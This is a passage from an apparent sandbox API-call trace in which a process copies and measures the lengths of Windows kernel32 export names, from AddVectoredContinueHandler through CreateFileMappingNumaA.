returned="AddVectoredContinueHandler" [0087.212] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.212] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.212] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.212] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.212] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.212] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.213] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.213] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.213] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.213] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.213] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.213] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.213] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.213] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.213] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.213] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.213] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.213] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.213] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.213] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.213] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.213] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.213] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.213] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.213] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.214] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.214] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.214] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.214] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.214] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.214] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.214] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.214] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.214] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.214] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.214] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.214] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.214] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.214] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.214] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.214] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.214] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.214] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.214] lstrlenA (lpString="BEEP") returned 4 [0087.214] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.215] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.215] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.215] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.215] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.215] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.215] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.215] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.215] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.215] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.215] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.215] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.215] lstrlenA (lpString="CANCELIO") returned 8 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.215] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.215] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.215] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.215] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.215] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.215] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.215] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.215] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.216] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.216] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.216] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.216] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.216] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.216] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.216] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.216] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.216] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.216] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.216] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.216] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.216] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.216] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.216] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.217] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.217] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.217] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.217] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.217] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.217] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.217] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.217] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.217] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.217] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.217] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.217] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.217] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.217] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.217] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.217] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.217] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.217] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.217] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.217] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.218] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.218] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.218] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.218] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.218] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.218] lstrlenA (lpString="COPYFILEA") returned 9 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.218] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.218] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.218] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.218] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.218] lstrlenA (lpString="COPYFILEW") returned 9 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.218] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.218] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.218] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.218] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.218] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.218] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.218] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.218] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.219] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.219] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.219] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.219] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.219] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.219] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.219] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.219] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.219] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.219] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.219] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.219] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.219] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.219] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") 